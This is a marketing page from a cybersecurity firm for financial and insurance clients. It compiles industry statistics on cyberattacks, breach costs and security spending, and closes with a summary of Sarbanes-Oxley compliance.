Financial and Insurance

Cybersecurity for Financial and Insurance + Regulatory Risk Management

USA Cybersecurity is a veteran owned small business located in Washington, D.C. certified to deliver cybersecurity and digital forensic services to government agencies, government contractors and commercial businesses. 

Dozens of recent studies examine the state of cybersecurity and the financial and Insurance Industries. Cybersecurity Ventures forecast cybercrime damages will rise to $6 trillion annually across the globe by 2021. Consequently, financial institutions have had to invest in cybersecurity in a way that mirrors their previous investment in physical security.

Our managed services and regulatory compliance offerings include using the brightest security-cleared minds and the most sophisticated equipment available. Our primary focus is to secure the infrastructure of the Continental United States (CONUS). Our secondary focus is to secure the infrastructure of our allies and friends Outside Continental United States (OCONUS). All services are provided remotely or in-person.

Security the top concern among community banks
According to a survey of 571 community banks in 37 states, conducted by the Conference of State Bank Supervisors, more than 70% of respondents ranked cybersecurity as their top concern. 

Financial services are 300x more likely to be attacked
Financial services firms are 300 times as likely as other companies to be targeted by a cyberattack, according to a report by the Boston Consulting Group. Dealing with those attacks and their aftermath carries a higher cost for banks and wealth managers than for any other sector. A report by IBM X-Force Threat Intelligence Index supports this finding. By the end of 2018, the finance and insurance sector was “the most-attacked industry for three years in a row.” IBM says the financial services vertical accounted for nearly one-fifth (19%) of the total incidents and attacks across all vertical markets that year.

These four methods comprise more than 90% of cyber-attacks
An annual security report by Akamai found that “94% of observed attacks against the financial services sector came from one of four methods: 

  1. SQL Injection (SQLi)
  2. Local File Inclusion (LFI)
  3. Cross-Site Scripting (XSS)
  4. OGNL Java Injection.”

The same report notes that “50% of all unique organizations impacted by observed phishing domains were from the financial services sector.”

Most financial firms have had an incident recently 
A survey by the technology research firm Vanson Bourne of “100 senior business decision-makers” employed by financial services organizations in the UK found 70% have experienced a security incident in the last 12 months. Most incidents stemmed “from employees failing to follow security protocol or data protection policies.” Other causes for security incidents “included the introduction of malware and viruses via 3rd party devices, including USBs and BYOD (32%), file and image downloads (25%) and employees sharing data with unintended recipients (24%).”

The volume of breaches continues to grow
According to the Cost of Cybercrime Study in Financial Services: 2019 Report by Accenture, the average number of breaches grew by 13% to 152 in 2018 from 134 in 2017.The same report revealed several other benchmarks:

Malicious insiders are the most expensive attack
Malicious insiders were the most expensive category of attack to resolve. This type costs an average of $243,101, which represented a 44% increase over the previous year. Rounding out the top five were malicious code at $157,891; phishing and social engineering at $156,690; denial of service at $133,949; and web-based attacks at $84,954.

Malicious insiders also took the longest to revolve
Attacks involving malicious insiders took financial services an average of 55.1 days to resolve. This was followed by malicious code which took 49.8 days; ransomware at 33.8 days; web-based attacks at 25.9 days; and phishing and social engineering at 24.3 days to resolve.

Cybercrime costs financial services $18.5 million annually
The average cost of cybercrime per company in financial services was $18.5 million. That was higher than any other vertical market (utilities ranked second at $17.84 million) and considerably higher than the same average across all sectors which came in at $13 million. Cost of Cybercrime Study in Financial Services: 2019 Report from Accenture

The average security budget in financial services
Financial institutions spend an average of .3% of revenue and 10% of their IT budget on cybersecurity, according to numbers tallied by the consulting firm Deloitte. That works out to about $2,300 per employee, across the 96 financial firms that took part in the Deloitte study, according to American Banker.

Banks will invest in managed security and integration services
The banking community will invest more in security solutions than any other industry, according to a spending forecast by research firm IDC. When combined with the other top spenders – manufacturing and federal governments – they “will account for nearly 30% of all security spending worldwide.” IDC puts that number at an estimated $151.2 billion by 2023. The research says all three sectors, including banks, will invest more than 35% of their respective budgets in “managed security services and integration services.”

Better at detection than prevention 
A survey of 400 security professionals across financial services by the Ponemon Institute found the financial services industry is more “effective in detecting (56%) and containing (53%) cyberattacks than in preventing attacks (31%).”

The same survey found while most of the sector is concern about supply chain risks, less than half have put steps in place to mitigate the risk. Some 74% “of respondents were concerned or very concerned about the security posture of third-party software and systems.” However, “only 43% of respondents said their organizations impose cybersecurity requirements on third parties involved in developing financial software and systems.”

9) Cybersecurity deluge: hundreds of thousands of security alerts. Anecdotally, security leaders at Mastercard told the New York Times they face upwards of “460,000 intrusion attempts in a typical day, up 70 percent from a year ago.” At one point, the credit card company showed the news organization a “wall of monitors” tracking 267,322 in a period of just 24 hours. Research shows this isn’t an isolated case. A survey of banks conducted by the market research firm Ovum in 2017 found about 40% of banks get 160,000 duplicate, irrelevant, or erroneous cybersecurity alerts every day. These alerts are generated from an array of tools – about three-quarters (73%) of firms are running 25 or more tools.

10) Who the CISO reports to within financial services. A survey of 277 senior executives by the consulting firm Infosys provides a glimpse as to the organization of security within financial services. Most respondents said the CISO reports to either the CIO (34%) or the Board (32%). The “information security council” ranked third (23%) and the numbers drop off considerably from there: head of audit (5%); COO (3%); head of risk (3%) and others (1%).

Sarbanes-Oxley Act Compliance
USA Cybersecurity Sarbanes-Oxley Act of 2002, often simply called SOX or Sarbox, is U.S. law meant to protect investors from fraudulent accounting activities by corporations. It also covers issues such as auditor independence, corporate governance, internal control assessment, and enhanced financial disclosure.

Sarbanes-Oxley (SOX) was implemented in 2002 and legislates how business records are protected and preserved to prevent destruction and corruption. SOX has also set e-records management standards to which all businesses should adhere. SOX mandates that all electronic records (including faxes), be retained for a period of seven years. Furthermore, it requires tamper-proof resources to prevent the corruption and modification of records. This rule is designed to protect investors from fraudulent activity and to safeguard financial data.

Entities subject to SOX compliance include all US-based publicly traded companies and international companies that have registered equity or debt securities with the Securities and Exchange Commission. Accounting firms that provide auditing services to the above entities are also subject to SOX compliance.

Contact USA Cybersecurity